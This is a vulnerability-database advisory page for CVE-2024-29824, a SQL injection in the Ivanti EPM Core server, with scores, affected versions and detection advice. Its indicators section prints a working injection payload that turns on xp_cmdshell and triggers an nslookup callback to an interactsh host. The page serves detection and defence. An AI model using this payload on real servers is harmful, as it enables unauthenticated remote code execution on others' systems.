cbcvebase.
CVE-2024-29824
published 2024-05-31

CVE-2024-29824: An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to…

PriorityP192high8.8CVSS 3.1
AVAACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2024-10-23
Exploited in the wild
EPSS
99.95%
100.0th percentile
An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.

Affected

3 ranges
VendorProductVersion rangeFixed in
ivantiendpoint_manager< 20222022
ivantiendpoint_manager
ivantiepm2022 SU5 – 2022 SU5

Detection & IOCsextracted from sources · hover to see the quote

url/WSStatusEvents/EventHandler.asmx
commandGoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup {{interactsh-url}}'--
path/WSStatusEvents/EventHandler.asmx
  • Review MS SQL logs for evidence of xp_cmdshell being used to obtain command execution on Ivanti EPM servers.
  • The SQL injection payload targets PatchBiz.dll via the EPM Core server; monitor for SQLi patterns in traffic to this component.
  • Detect exploitation attempts by monitoring POST requests to /WSStatusEvents/EventHandler.asmx with SOAP content-type containing SQL injection strings (e.g., sp_configure, xp_cmdshell) in the body.
  • Check Point IPS signature available for this vulnerability; deploy the named rule for network-level detection.
  • The Nuclei template confirms exploitation by matching 'UpdateStatusEventsResponse' in the HTTP response body and a DNS interaction via interactsh, indicating successful xp_cmdshell execution.
  • ·Exploitation requires the attacker to be on the same network as the Ivanti EPM Core server (adjacent network attack vector, AV:A); this is not a remotely exploitable vulnerability from the internet.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv3.09.6CRITICALCVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck8.8HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.